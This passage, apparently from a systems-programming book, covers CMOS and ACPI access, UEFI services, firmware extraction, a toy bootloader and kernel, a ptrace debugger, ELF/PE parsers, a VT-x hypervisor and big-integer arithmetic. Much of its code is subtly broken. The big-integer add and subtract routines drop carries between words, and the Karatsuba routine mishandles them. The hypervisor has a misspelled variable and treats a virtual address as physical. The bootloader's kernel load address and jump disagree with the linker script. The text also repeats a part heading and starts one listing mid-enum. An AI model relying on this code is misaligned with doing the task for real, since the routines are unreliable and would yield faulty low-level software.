lsl r2, r2, r0
ldr r3, =NVIC_ISER_BASE
str r2, [r3, r1, lsl #2]

Interrupt Handler

; EXTI0 interrupt handler
EXTI0_IRQHandler:
    push {r0-r3, lr}
    
    ; Check if EXTI0 triggered
    ldr r0, =EXTI_PR
    ldr r1, [r0]
    tst r1, #1
    beq .done
    
    ; Clear pending bit
    str r1, [r0]
    
    ; Handle interrupt
    bl handle_button_press
    
.done:
    pop {r0-r3, pc}

Chapter 24: BIOS & Firmware

24.1 CMOS

CMOS memory stores system configuration.

CMOS Access

; Read CMOS register
; AL = register number
read_cmos:
    out 0x70, al      ; select register
    in al, 0x71       ; read data
    ret

; Write CMOS register
; AL = register number, AH = data
write_cmos:
    out 0x70, al
    mov al, ah
    out 0x71, al
    ret

Common CMOS Registers

0x00: Seconds
0x02: Minutes
0x04: Hours
0x07: Day of month
0x08: Month
0x09: Year
0x0A: Status register A
0x0B: Status register B
0x0C: Status register C
0x0D: Status register D
0x10: Floppy drive type
0x12: Hard disk type
0x14: Equipment list

24.2 ACPI

Advanced Configuration and Power Interface.

ACPI Tables

RSDP (Root System Description Pointer)
  - Signature "RSD PTR "
  - Checksum
  - OEM ID
  - RSDT address

RSDT (Root System Description Table)
  - Pointers to other tables
  - FADT, MADT, SSDT, etc.

FADT (Fixed ACPI Description Table)
  - Power management info
  - DSDT address
  - SCI interrupt

Finding ACPI Tables

; Search for RSDP in BIOS memory
find_rsdp:
    mov esi, 0xE0000   ; start of BIOS area
.search_loop:
    cmp dword [esi], 'RSD '  ; "RSD "
    jne .next
    cmp dword [esi+4], 'PTR ' ; " PTR"
    je .found
.next:
    add esi, 16
    cmp esi, 0x100000
    jl .search_loop
    xor eax, eax        ; not found
    ret
.found:
    mov eax, esi
    ret

24.3 UEFI Internals

UEFI Runtime Services

// Get variable
EFI_STATUS GetVariable(
    CHAR16 *VariableName,
    EFI_GUID *VendorGuid,
    UINT32 *Attributes,
    UINTN *DataSize,
    VOID *Data
);

// Set variable
EFI_STATUS SetVariable(
    CHAR16 *VariableName,
    EFI_GUID *VendorGuid,
    UINT32 Attributes,
    UINTN DataSize,
    VOID *Data
);

// Get time
EFI_STATUS GetTime(
    EFI_TIME *Time,
    EFI_TIME_CAPABILITIES *Capabilities
);

UEFI Protocols

// Simple File System Protocol
struct EFI_SIMPLE_FILE_SYSTEM_PROTOCOL {
    UINT64 Revision;
    EFI_OPEN_VOLUME OpenVolume;
};

// Get file system handle
EFI_SIMPLE_FILE_SYSTEM_PROTOCOL *FileSystem;
status = BS->HandleProtocol(
    DeviceHandle,
    &gEfiSimpleFileSystemProtocolGuid,
    (VOID**)&FileSystem
);

// Open volume
EFI_FILE_PROTOCOL *Root;
status = FileSystem->OpenVolume(FileSystem, &Root);

24.4 Firmware Reverse Engineering

Extracting Firmware

# Dump BIOS from Linux
flashrom -r bios.bin

# Extract UEFI firmware
# from /sys/firmware/efi/efivars/
# or from flash chip

Analyzing Firmware

# Check strings
strings bios.bin | grep -i "copyright\|version\|model"

# Check entropy
binwalk -E bios.bin

# Extract components
binwalk -e bios.bin

Common Firmware Structures

UEFI Firmware Volume:
  - Volume header
  - File system
  - FFS files (PE/COFF images)

BIOS:
  - POST code
  - Runtime services
  - ACPI tables
  - VGA BIOS option ROMs

Finding Entry Points

; Look for BIOS entry point
; Usually at F000:FFF0 (reset vector)
; Contains far jump to POST code

; UEFI SEC/PEI phase entry
; Look for specific GUIDs in firmware volume

PART X — Practical Projects

Chapter 25: Building a Tiny OS

Bootloader

Stage 1 Bootloader

; boot1.asm - First stage bootloader
[org 0x7C00]
[bits 16]

start:
    ; Set up segments
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0x7C00
    
    ; Save boot drive
    mov [boot_drive], dl
    
    ; Print message
    mov si, msg_boot1
    call print_string
    
    ; Load second stage
    mov si, msg_loading
    call print_string
    
    mov ah, 0x02        ; read sectors
    mov al, 0x20        ; sectors to read
    mov ch, 0           ; cylinder
    mov cl, 2           ; sector
    mov dh, 0           ; head
    mov dl, [boot_drive]
    mov bx, 0x1000      ; buffer segment
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Jump to second stage
    jmp 0x1000:0x0000

disk_error:
    mov si, msg_error
    call print_string
    jmp $

print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

boot_drive db 0
msg_boot1 db "TinyOS Bootloader Stage 1", 13, 10, 0
msg_loading db "Loading Stage 2...", 13, 10, 0
msg_error db "Disk error!", 13, 10, 0

times 510-($-$$) db 0
dw 0xAA55

Stage 2 Bootloader

; boot2.asm - Second stage bootloader
[org 0x0000]
[bits 16]

start:
    ; Set up segments
    mov ax, cs
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0xFFFF
    
    ; Print message
    mov si, msg_boot2
    call print_string
    
    ; Enable A20 line
    call enable_a20
    
    ; Load kernel
    mov si, msg_load_kernel
    call print_string
    
    ; Load kernel from disk
    mov ah, 0x02
    mov al, 0x40        ; 64 sectors (32KB)
    mov ch, 0
    mov cl, 0x22        ; after boot sectors
    mov dh, 0
    mov dl, [boot_drive]
    mov bx, 0x2000      ; kernel segment
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Switch to protected mode
    call switch_to_pm
    
    ; Should never return
    jmp $

enable_a20:
    in al, 0x92
    or al, 2
    out 0x92, al
    ret

; ... print_string, disk_error as before ...

%include "gdt.inc"

switch_to_pm:
    cli
    lgdt [gdt_desc]
    
    mov eax, cr0
    or eax, 1
    mov cr0, eax
    
    jmp 0x08:pm_start

[bits 32]
pm_start:
    mov ax, 0x10
    mov ds, ax
    mov es, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax
    mov esp, 0x90000
    
    ; Jump to kernel
    jmp 0x2000:0x0000

boot_drive db 0
msg_boot2 db "TinyOS Bootloader Stage 2", 13, 10, 0
msg_load_kernel db "Loading kernel...", 13, 10, 0

Kernel

Minimal Kernel

// kernel.c - Minimal kernel
void kernel_main(void) {
    // VGA text mode buffer
    char *video = (char*)0xB8000;
    char *message = "Hello from TinyOS Kernel!";
    
    // Clear screen
    for (int i = 0; i < 80 * 25 * 2; i += 2) {
        video[i] = ' ';
        video[i + 1] = 0x07;
    }
    
    // Print message
    int i = 0;
    while (message[i]) {
        video[i * 2] = message[i];
        video[i * 2 + 1] = 0x0A;  // green
        i++;
    }
    
    // Hang
    while (1) {
        __asm__("hlt");
    }
}

Linker Script

/* kernel.ld */
OUTPUT_FORMAT(elf32-i386)
ENTRY(kernel_main)

SECTIONS
{
    . = 0x200000;
    
    .text : {
        *(.text)
        *(.text.*)
    }
    
    .data : {
        *(.data)
        *(.data.*)
    }
    
    .bss : {
        *(.bss)
        *(.bss.*)
    }
    
    /DISCARD/ : {
        *(.comment)
        *(.eh_frame)
    }
}

Memory Manager

Simple Page Allocator

// memory.c - Physical memory manager
#define PAGE_SIZE 4096
#define PAGE_COUNT (1024 * 1024)  // 4GB / 4KB
static uint32_t page_bitmap[PAGE_COUNT / 32];

void init_memory(uint32_t memory_size) {
    // Mark all pages as used initially
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        page_bitmap[i] = 0xFFFFFFFF;
    }
    
    // Mark kernel memory as used
    uint32_t kernel_pages = (uint32_t)&_kernel_end - 0x200000;
    kernel_pages = (kernel_pages + PAGE_SIZE - 1) / PAGE_SIZE;
    
    for (uint32_t i = 0; i < kernel_pages + 1; i++) {
        uint32_t index = i / 32;
        uint32_t bit = i % 32;
        page_bitmap[index] &= ~(1 << bit);
    }
}

void* alloc_page(void) {
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        if (page_bitmap[i] != 0) {
            // Find first free bit
            int bit = __builtin_ctz(page_bitmap[i]);
            page_bitmap[i] &= ~(1 << bit);
            return (void*)((i * 32 + bit) * PAGE_SIZE);
        }
    }
    return NULL;  // Out of memory
}

void free_page(void* page) {
    uint32_t pfn = (uint32_t)page / PAGE_SIZE;
    uint32_t index = pfn / 32;
    uint32_t bit = pfn % 32;
    page_bitmap[index] |= (1 << bit);
}

Scheduler

Round-Robin Scheduler

// scheduler.c
#define MAX_TASKS 64
#define STACK_SIZE 4096

typedef struct {
    uint32_t esp;
    uint32_t ebp;
    uint32_t eip;
    uint32_t state;  // 0 = free, 1 = ready, 2 = running
    uint8_t stack[STACK_SIZE];
} task_t;

static task_t tasks[MAX_TASKS];
static int current_task = -1;
static int next_task = 0;

void scheduler_init(void) {
    for (int i = 0; i < MAX_TASKS; i++) {
        tasks[i].state = 0;  // free
    }
}

int create_task(void (*entry)(void)) {
    // Find free task slot
    int i;
    for (i = 0; i < MAX_TASKS; i++) {
        if (tasks[i].state == 0) break;
    }
    if (i == MAX_TASKS) return -1;
    
    // Initialize stack
    uint32_t *stack = (uint32_t*)(tasks[i].stack + STACK_SIZE - 4);
    
    // Set up initial context (for context switch)
    *--stack = (uint32_t)entry;      // EIP
    *--stack = 0;                    // EFLAGS
    *--stack = 0;                    // EAX
    *--stack = 0;                    // ECX
    *--stack = 0;                    // EDX
    *--stack = 0;                    // EBX
    *--stack = 0;                    // ESP (unused)
    *--stack = (uint32_t)stack + 32; // EBP
    *--stack = 0;                    // ESI
    *--stack = 0;                    // EDI
    
    tasks[i].esp = (uint32_t)stack;
    tasks[i].state = 1;  // ready
    
    return i;
}

// Called by timer interrupt
void schedule(void) {
    if (current_task != -1) {
        // Save current task state
        __asm__ volatile(
            "mov %%esp, %0\n"
            "mov %%ebp, %1\n"
            : "=r"(tasks[current_task].esp),
              "=r"(tasks[current_task].ebp)
        );
        tasks[current_task].state = 1;
    }
    
    // Find next ready task
    int found = 0;
    for (int i = 0; i < MAX_TASKS; i++) {
        next_task = (next_task + 1) % MAX_TASKS;
        if (tasks[next_task].state == 1) {
            found = 1;
            break;
        }
    }
    
    if (!found) {
        // No tasks, just return
        return;
    }
    
    // Switch to next task
    current_task = next_task;
    tasks[current_task].state = 2;
    
    // Restore task state
    __asm__ volatile(
        "mov %0, %%esp\n"
        "mov %1, %%ebp\n"
        :
        : "r"(tasks[current_task].esp),
          "r"(tasks[current_task].ebp)
    );
}

Chapter 26: Writing a Custom Debugger

Breakpoints

Software Breakpoints (INT3)

// Set software breakpoint
void set_breakpoint(pid_t pid, void *addr) {
    // Save original instruction
    unsigned char original;
    read_process_memory(pid, addr, &original, 1);
    
    // Write INT3 (0xCC)
    unsigned char int3 = 0xCC;
    write_process_memory(pid, addr, &int3, 1);
    
    // Store original for later
    breakpoint *bp = malloc(sizeof(breakpoint));
    bp->addr = addr;
    bp->original = original;
    // Add to breakpoint list
}

// Handle breakpoint hit
void handle_breakpoint(pid_t pid) {
    // Get register context
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    
    // RIP points to next instruction after INT3
    void *bp_addr = (void*)(regs.rip - 1);
    
    // Restore original instruction
    breakpoint *bp = find_breakpoint(bp_addr);
    write_process_memory(pid, bp_addr, &bp->original, 1);
    
    // Single-step to execute original instruction
    ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
    wait(NULL);
    
    // Re-insert breakpoint
    unsigned char int3 = 0xCC;
    write_process_memory(pid, bp_addr, &int3, 1);
    
    // Continue execution
    ptrace(PTRACE_CONT, pid, NULL, NULL);
}

Hardware Breakpoints

; Set hardware breakpoint via debug registers
set_hw_breakpoint:
    ; DR0 = breakpoint address
    mov rax, [breakpoint_addr]
    mov dr0, rax
    
    ; DR7 = enable breakpoint 0, type = execution
    mov rax, 0x1        ; L0 = 1
    or rax, 0x300       ; R/W0 = 00 (execution)
    or rax, 0x30000     ; LEN0 = 00 (1 byte)
    mov dr7, rax
    
    ret

Register Inspection

Reading Registers with ptrace

void print_registers(pid_t pid) {
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) {
        perror("ptrace GETREGS");
        return;
    }
    
    printf("RAX: 0x%016llx\n", regs.rax);
    printf("RBX: 0x%016llx\n", regs.rbx);
    printf("RCX: 0x%016llx\n", regs.rcx);
    printf("RDX: 0x%016llx\n", regs.rdx);
    printf("RSI: 0x%016llx\n", regs.rsi);
    printf("RDI: 0x%016llx\n", regs.rdi);
    printf("RBP: 0x%016llx\n", regs.rbp);
    printf("RSP: 0x%016llx\n", regs.rsp);
    printf("RIP: 0x%016llx\n", regs.rip);
    printf("EFLAGS: 0x%08llx\n", regs.eflags);
}

Disassembler Engine

Simple Disassembler

// Simple x86 disassembler for common instructions
typedef struct {
    char mnemonic[16];
    char operands[64];
} instruction_t;

instruction_t disassemble(unsigned char *code, size_t *size) {
    instruction_t inst = {0};
    
    unsigned char opcode = code[0];
    
    switch (opcode) {
        case 0x90:
            strcpy(inst.mnemonic, "nop");
            *size = 1;
            break;
            
        case 0xC3:
            strcpy(inst.mnemonic, "ret");
            *size = 1;
            break;
            
        case 0xCC:
            strcpy(inst.mnemonic, "int3");
            *size = 1;
            break;
            
        case 0x50 ... 0x57:  // push r64
            strcpy(inst.mnemonic, "push");
            sprintf(inst.operands, "r%x", opcode - 0x50);
            *size = 1;
            break;
            
        case 0x58 ... 0x5F:  // pop r64
            strcpy(inst.mnemonic, "pop");
            sprintf(inst.operands, "r%x", opcode - 0x58);
            *size = 1;
            break;
            
        case 0xB8 ... 0xBF:  // mov r32, imm32
            strcpy(inst.mnemonic, "mov");
            sprintf(inst.operands, "e%x, 0x%x", 
                    opcode - 0xB8, *(uint32_t*)(code + 1));
            *size = 5;
            break;
            
        default:
            strcpy(inst.mnemonic, "db");
            sprintf(inst.operands, "0x%02x", opcode);
            *size = 1;
    }
    
    return inst;
}

Chapter 27: Writing a PE/ELF Parser

ELF Parser

// elf_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <elf.h>

typedef struct {
    FILE *fp;
    Elf64_Ehdr ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    char *shstrtab;
} elf_file_t;

elf_file_t* elf_open(const char *filename) {
    elf_file_t *elf = malloc(sizeof(elf_file_t));
    
    elf->fp = fopen(filename, "rb");
    if (!elf->fp) {
        free(elf);
        return NULL;
    }
    
    // Read ELF header
    fread(&elf->ehdr, sizeof(Elf64_Ehdr), 1, elf->fp);
    
    // Verify ELF magic
    if (elf->ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
        elf->ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
        elf->ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
        elf->ehdr.e_ident[EI_MAG3] != ELFMAG3) {
        fclose(elf->fp);
        free(elf);
        return NULL;
    }
    
    // Read program headers
    elf->phdr = malloc(elf->ehdr.e_phnum * sizeof(Elf64_Phdr));
    fseek(elf->fp, elf->ehdr.e_phoff, SEEK_SET);
    fread(elf->phdr, sizeof(Elf64_Phdr), elf->ehdr.e_phnum, elf->fp);
    
    // Read section headers
    elf->shdr = malloc(elf->ehdr.e_shnum * sizeof(Elf64_Shdr));
    fseek(elf->fp, elf->ehdr.e_shoff, SEEK_SET);
    fread(elf->shdr, sizeof(Elf64_Shdr), elf->ehdr.e_shnum, elf->fp);
    
    // Read section header string table
    if (elf->ehdr.e_shstrndx != SHN_UNDEF) {
        Elf64_Shdr *shstr = &elf->shdr[elf->ehdr.e_shstrndx];
        elf->shstrtab = malloc(shstr->sh_size);
        fseek(elf->fp, shstr->sh_offset, SEEK_SET);
        fread(elf->shstrtab, 1, shstr->sh_size, elf->fp);
    }
    
    return elf;
}

void elf_print_info(elf_file_t *elf) {
    printf("ELF Type: ");
    switch (elf->ehdr.e_type) {
        case ET_REL:  printf("REL (Relocatable)\n"); break;
        case ET_EXEC: printf("EXEC (Executable)\n"); break;
        case ET_DYN:  printf("DYN (Shared object)\n"); break;
        default:      printf("Unknown\n");
    }
    
    printf("Entry point: 0x%lx\n", elf->ehdr.e_entry);
    printf("Program headers: %d\n", elf->ehdr.e_phnum);
    printf("Section headers: %d\n", elf->ehdr.e_shnum);
    
    // Print program headers
    for (int i = 0; i < elf->ehdr.e_phnum; i++) {
        Elf64_Phdr *p = &elf->phdr[i];
        printf("PHDR %d: type=%d vaddr=0x%lx memsz=%ld\n",
               i, p->p_type, p->p_vaddr, p->p_memsz);
    }
    
    // Print sections
    for (int i = 0; i < elf->ehdr.e_shnum; i++) {
        Elf64_Shdr *s = &elf->shdr[i];
        char *name = elf->shstrtab + s->sh_name;
        printf("SEC %d: %-12s addr=0x%lx size=%ld\n",
               i, name, s->sh_addr, s->sh_size);
    }
}

void elf_close(elf_file_t *elf) {
    fclose(elf->fp);
    free(elf->phdr);
    free(elf->shdr);
    if (elf->shstrtab) free(elf->shstrtab);
    free(elf);
}

PE Parser

// pe_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

typedef struct {
    FILE *fp;
    IMAGE_DOS_HEADER dos_header;
    IMAGE_NT_HEADERS nt_headers;
    IMAGE_SECTION_HEADER *sections;
} pe_file_t;

pe_file_t* pe_open(const char *filename) {
    pe_file_t *pe = malloc(sizeof(pe_file_t));
    
    pe->fp = fopen(filename, "rb");
    if (!pe->fp) {
        free(pe);
        return NULL;
    }
    
    // Read DOS header
    fread(&pe->dos_header, sizeof(IMAGE_DOS_HEADER), 1, pe->fp);
    
    // Verify DOS magic
    if (pe->dos_header.e_magic != IMAGE_DOS_SIGNATURE) {
        fclose(pe->fp);
        free(pe);
        return NULL;
    }
    
    // Seek to NT headers
    fseek(pe->fp, pe->dos_header.e_lfanew, SEEK_SET);
    
    // Read NT headers
    fread(&pe->nt_headers, sizeof(IMAGE_NT_HEADERS), 1, pe->fp);
    
    // Verify PE signature
    if (pe->nt_headers.Signature != IMAGE_NT_SIGNATURE) {
        fclose(pe->fp);
        free(pe);
        return NULL;
    }
    
    // Read section headers
    int num_sections = pe->nt_headers.FileHeader.NumberOfSections;
    pe->sections = malloc(num_sections * sizeof(IMAGE_SECTION_HEADER));
    fread(pe->sections, sizeof(IMAGE_SECTION_HEADER), 
          num_sections, pe->fp);
    
    return pe;
}

void pe_print_info(pe_file_t *pe) {
    IMAGE_FILE_HEADER *file = &pe->nt_headers.FileHeader;
    IMAGE_OPTIONAL_HEADER *opt = &pe->nt_headers.OptionalHeader;
    
    printf("Machine: 0x%04x\n", file->Machine);
    printf("Sections: %d\n", file->NumberOfSections);
    printf("Entry point: 0x%08x\n", opt->AddressOfEntryPoint);
    printf("Image base: 0x%016llx\n", opt->ImageBase);
    
    // Print sections
    for (int i = 0; i < file->NumberOfSections; i++) {
        IMAGE_SECTION_HEADER *s = &pe->sections[i];
        printf("SEC %d: %-8s vaddr=0x%08x size=%d\n",
               i, s->Name, s->VirtualAddress, s->SizeOfRawData);
    }
}

void pe_close(pe_file_t *pe) {
    fclose(pe->fp);
    free(pe->sections);
    free(pe);
}

PART X — Practical Projects

Chapter 28: Building a Hypervisor

    EXIT_QUALIFICATION        = 0x6000,
    IO_RCX                     = 0x6002,
    IO_RSI                     = 0x6004,
    IO_RDI                     = 0x6006,
    IO_RIP                     = 0x6008,
    GUEST_LINEAR_ADDRESS       = 0x600A,
    GUEST_CR0                  = 0x600C,
    GUEST_CR3                  = 0x600E,
    GUEST_CR4                  = 0x6010,
    GUEST_ES_BASE              = 0x6012,
    GUEST_CS_BASE              = 0x6014,
    GUEST_SS_BASE              = 0x6016,
    GUEST_DS_BASE              = 0x6018,
    GUEST_FS_BASE              = 0x601A,
    GUEST_GS_BASE              = 0x601C,
    GUEST_LDTR_BASE            = 0x601E,
    GUEST_TR_BASE              = 0x6020,
    GUEST_GDTR_BASE            = 0x6022,
    GUEST_IDTR_BASE            = 0x6024,
    GUEST_DR7                  = 0x6026,
    GUEST_RSP                  = 0x6028,
    GUEST_RIP                  = 0x602A,
    GUEST_RFLAGS               = 0x602C,
    GUEST_PENDING_DBG_EXCEPTIONS = 0x602E,
    GUEST_SYSENTER_ESP         = 0x6030,
    GUEST_SYSENTER_EIP         = 0x6032,
    HOST_CR0                   = 0x6034,
    HOST_CR3                   = 0x6036,
    HOST_CR4                   = 0x6038,
    HOST_FS_BASE               = 0x603A,
    HOST_GS_BASE               = 0x603C,
    HOST_TR_BASE               = 0x603E,
    HOST_GDTR_BASE             = 0x6040,
    HOST_IDTR_BASE             = 0x6042,
    HOST_RSP                   = 0x6044,
    HOST_RIP                   = 0x6046
};

Simple Hypervisor Implementation

// hypervisor.c - Minimal VT-x hypervisor
#include <stdint.h>
#include <string.h>

// VMX region structures
typedef struct {
    uint32_t revision_id;
    uint32_t abort_indicator;
    uint8_t data[0];
} __attribute__((packed)) vmxon_region_t;

typedef struct {
    uint32_t revision_id;
    uint8_t data[0];
} __attribute__((packed)) vmcs_t;

// VM-exit information
typedef struct {
    uint64_t exit_reason;
    uint64_t exit_qualification;
    uint64_t guest_linear_address;
    uint64_t guest_physical_address;
    uint64_t instruction_length;
    uint64_t instruction_info;
    uint64_t interrupt_info;
    uint64_t error_code;
} __attribute__((packed)) vm_exit_info_t;

// Global state
static vmxon_region_t *vmxon_region;
static vmcs_t *vmcs;
static void *vmxon_region_physical;
static void *vmcs_physical;

// Check for VMX support
int vmx_supported(void) {
    uint32_t eax, ebx, ecx, edx;
    
    // Check CPUID.1:ECX.VMX bit
    __asm__ volatile("cpuid"
                     : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
                     : "a"(1));
    
    if (!(ecx & (1 << 5))) {
        return 0;  // VMX not supported
    }
    
    // Check CR4.VMXE bit can be set
    uint64_t cr4;
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    cr4 |= (1 << 13);  // VMXE bit
    __asm__ volatile("mov %0, %%cr4" : : "r"(cr4));
    
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    if (!(cr4 & (1 << 13))) {
        return 0;  // Cannot enable VMX
    }
    
    return 1;
}

// Initialize VMX
int vmx_init(void) {
    if (!vmx_supported()) {
        return -1;
    }
    
    // Allocate VMXON region (4KB aligned)
    vmxon_region = aligned_alloc(4096, 4096);
    if (!vmxon_region) {
        return -1;
    }
    memset(vmxon_region, 0, 4096);
    
    // Get VMX revision ID from IA32_VMX_BASIC MSR
    uint32_t msrl, msrh;
    __asm__ volatile("rdmsr" : "=a"(msrl), "=d"(msrh) : "c"(0x480));
    vmxon_region->revision_id = msrl & 0x7FFFFFFF;
    
    // Store physical address
    vmxon_region_physical = (void*)((uint64_t)vmxon_region & 0xFFFFFFFFFFFFF000);
    
    // Execute VMXON
    int success;
    __asm__ volatile(
        "vmxon %[pa]\n"
        "setna %0\n"
        : "=q"(success)
        : [pa] "m"(vmxon_region_physical)
        : "cc", "memory"
    );
    
    if (success) {
        free(vmxon_region);
        return -1;
    }
    
    // Allocate VMCS (4KB aligned)
    vmcs = aligned_alloc(4096, 4096);
    if (!vmcs) {
        vmxoff();
        free(vxon_region);
        return -1;
    }
    memset(vmcs, 0, 4096);
    vmcs->revision_id = msrl & 0x7FFFFFFF;
    vmcs_physical = (void*)((uint64_t)vmcs & 0xFFFFFFFFFFFFF000);
    
    // Clear and load VMCS
    __asm__ volatile(
        "vmclear %[pa]\n"
        "vmptrld %[pa]\n"
        : 
        : [pa] "m"(vmcs_physical)
        : "cc", "memory"
    );
    
    return 0;
}

// Configure VMCS for guest
void vmx_setup_guest(void) {
    // Host state
    uint64_t cr0, cr3, cr4, rsp, rip;
    
    __asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
    __asm__ volatile("mov %%cr3, %0" : "=r"(cr3));
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    __asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
    
    // Get host RIP (return address after VM exit)
    rip = (uint64_t)vm_exit_handler;
    
    // Write host state to VMCS
    vmwrite(HOST_CR0, cr0);
    vmwrite(HOST_CR3, cr3);
    vmwrite(HOST_CR4, cr4);
    vmwrite(HOST_RSP, rsp);
    vmwrite(HOST_RIP, rip);
    
    // Set up control fields
    uint32_t pin_ctls = 0;
    uint32_t cpu_ctls = CPU_BASED_HLT_EXITING |
                        CPU_BASED_CR8_LOAD_EXITING |
                        CPU_BASED_CR8_STORE_EXITING |
                        CPU_BASED_USE_MSR_BITMAPS;
    
    vmwrite(PIN_BASED_VM_EXEC_CONTROL, pin_ctls);
    vmwrite(CPU_BASED_VM_EXEC_CONTROL, cpu_ctls);
    
    // Set up exit controls
    uint32_t exit_ctls = 0;
    vmwrite(VM_EXIT_CONTROLS, exit_ctls);
    
    // Set up entry controls
    uint32_t entry_ctls = 0;
    vmwrite(VM_ENTRY_CONTROLS, entry_ctls);
}

// VM exit handler
void vm_exit_handler(void) {
    uint64_t exit_reason;
    uint64_t exit_qualification;
    
    // Read exit reason
    vmread(VM_EXIT_REASON, &exit_reason);
    vmread(EXIT_QUALIFICATION, &exit_qualification);
    
    // Handle different exit reasons
    switch (exit_reason & 0xFFFF) {
        case 0:  // Exception or NMI
            handle_exception(exit_qualification);
            break;
            
        case 10:  // CPUID
            handle_cpuid();
            break;
            
        case 12:  // HLT
            handle_hlt();
            break;
            
        case 18:  // VMCALL
            handle_vmcall();
            break;
            
        default:
            // Unknown exit - just resume
            break;
    }
    
    // Return to guest
    __asm__ volatile("vmresume");
}

// Launch guest
void vmx_launch_guest(void) {
    int failed;
    __asm__ volatile(
        "vmlaunch\n"
        "setna %0\n"
        : "=q"(failed)
        :
        : "cc", "memory"
    );
    
    if (failed) {
        // VM launch failed - check VMCS
        uint64_t error;
        vmread(VM_INSTRUCTION_ERROR, &error);
        printf("VMLAUNCH failed: error %llu\n", error);
    }
}

PART XI — Cryptography & Low-Level Math

Chapter 29: Big Integer Arithmetic

Big Integer Representation

// bigint.h - Big integer library
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    uint64_t *words;   // Array of 64-bit words
    size_t size;       // Number of words
    int sign;          // 0 positive, 1 negative
} bigint_t;

// Create new big integer
bigint_t* bigint_new(size_t size) {
    bigint_t *bn = malloc(sizeof(bigint_t));
    bn->words = calloc(size, sizeof(uint64_t));
    bn->size = size;
    bn->sign = 0;
    return bn;
}

// Free big integer
void bigint_free(bigint_t *bn) {
    free(bn->words);
    free(bn);
}

Addition and Subtraction

; bigint_add.asm - Big integer addition
; RDI = destination, RSI = first, RDX = second, RCX = word count
global bigint_add

bigint_add:
    push rbp
    mov rbp, rsp
    
    xor rax, rax        ; clear carry
    mov r8, rcx         ; counter
    
.loop:
    mov r9, [rsi + r8*8 - 8]   ; load from first
    mov r10, [rdx + r8*8 - 8]  ; load from second
    
    ; Add with carry
    add r9, r10
    adc rax, 0          ; capture carry
    
    ; Store result
    mov [rdi + r8*8 - 8], r9
    
    dec r8
    jnz .loop
    
    ; Return final carry
    pop rbp
    ret

; bigint_sub.asm - Big integer subtraction
global bigint_sub

bigint_sub:
    push rbp
    mov rbp, rsp
    
    xor rax, rax        ; clear borrow
    mov r8, rcx         ; counter
    
.loop:
    mov r9, [rsi + r8*8 - 8]
    mov r10, [rdx + r8*8 - 8]
    
    ; Subtract with borrow
    sub r9, r10
    sbb rax, 0          ; capture borrow
    
    mov [rdi + r8*8 - 8], r9
    
    dec r8
    jnz .loop
    
    pop rbp
    ret

Multiplication (Karatsuba)

// bigint_mul.c - Karatsuba multiplication
#include "bigint.h"

// Helper: add two big integers
void bigint_add_to(bigint_t *dest, bigint_t *src) {
    uint64_t carry = 0;
    for (size_t i = 0; i < dest->size && i < src->size; i++) {
        uint64_t sum = dest->words[i] + src->words[i] + carry;
        dest->words[i] = sum;
        carry = (sum < dest->words[i]) ? 1 : 0;
    }
}

// Karatsuba multiplication
bigint_t* bigint_mul(bigint_t *a, bigint_t *b) {
    size_t n = (a->size > b->size) ? a->size : b->size;
    
    // Base case: single word multiplication
    if (n == 1) {
        bigint_t *result = bigint_new(2);
        uint64_t low, high;
        
        // Multiply 64-bit values
        __asm__(
            "mulq %[b]\n"
            : "=a"(low), "=d"(high)
            : "a"(a->words[0]), [b]"r"(b->words[0])
        );
        
        result->words[0] = low;
        result->words[1] = high;
        return result;
    }
    
    // Split into halves
    size_t m = n / 2;
    
    bigint_t *a_low = bigint_new(m);
    bigint_t *a_high = bigint_new(n - m);
    bigint_t *b_low = bigint_new(m);
    bigint_t *b_high = bigint_new(n - m);
    
    memcpy(a_low->words, a->words, m * 8);
    memcpy(a_high->words, a->words + m, (n - m) * 8);
    memcpy(b_low->words, b->words, m * 8);
    memcpy(b_high->words, b->words + m, (n - m) * 8);
    
    // Recursive multiplications
    bigint_t *z0 = bigint_mul(a_low, b_low);
    bigint_t *z2 = bigint_mul(a_high, b_high);
    
    // (a_low + a_high) * (b_low + b_high)
    bigint_t *a_sum = bigint_new(m + (n - m));
    bigint_t *b_sum = bigint_new(m + (n - m));
    
    bigint_add_to(a_sum, a_low);
    bigint_add_to(a_sum, a_high);
    bigint_add_to(b_sum, b_low);
    bigint_add_to(b_sum, b_high);
    
    bigint_t *z1 = bigint_mul(a_sum, b_sum);
    
    // z1 = z1 - z0 - z2
    for (size_t i = 0; i < z1->size; i++) {
        if (i < z0->size) z1->words[i] -= z0->words[i];
        if (i < z2->size) z1->words[i] -= z2->words[i];
    }
    
    // Combine: result = z0 + (z1 << m) + (z2 << 2m)
    bigint_t *result = bigint_new(2 * n);
    
    // Add z0
    memcpy(result->words, z0->words, z0->size * 8);
    
    // Add z1 at offset m
    for (size_t i = 0; i < z1->size; i++) {
        result->words[i + m] += z1->words[i];
    }
    
    // Add z2 at offset 2m
    for (size_t i = 0; i < z2->size; i++) {
        result->words[i + 2*m] += z2->words[i];
    }
    
    // Handle carries
    uint64_t carry = 0;
    for (size_t i = 0; i < result->size; i++) {
        result->words[i] += carry;
